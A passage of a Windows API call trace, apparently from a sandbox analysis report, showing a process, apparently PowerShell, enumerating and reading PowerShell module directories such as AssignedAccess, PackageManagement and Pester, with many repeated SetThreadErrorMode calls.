lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0224.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.562] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.563] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0224.563] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.563] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.563] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0224.563] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0224.563] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.563] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.563] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.564] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0224.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc30) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbf0) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc80) returned 1 [0224.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbb0) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db70) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.794] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0224.794] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6f4 [0224.794] GetFileType (hFile=0x6f4) returned 0x1 [0224.794] GetFileType (hFile=0x6f4) returned 0x1 [0224.794] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be2dc68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be2dc68*, lpNumberOfBytesRead=0x653ef8dca8*=0x5f8, lpOverlapped=0x0) returned 1 [0224.795] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be2d1a0, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be2d1a0*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.795] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be2dc68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be2dc68*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.796] CloseHandle (hObject=0x6f4) returned 1 [0224.815] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0224.815] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0224.815] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0224.815] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0224.815] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0224.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0224.816] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8dac0 | out: 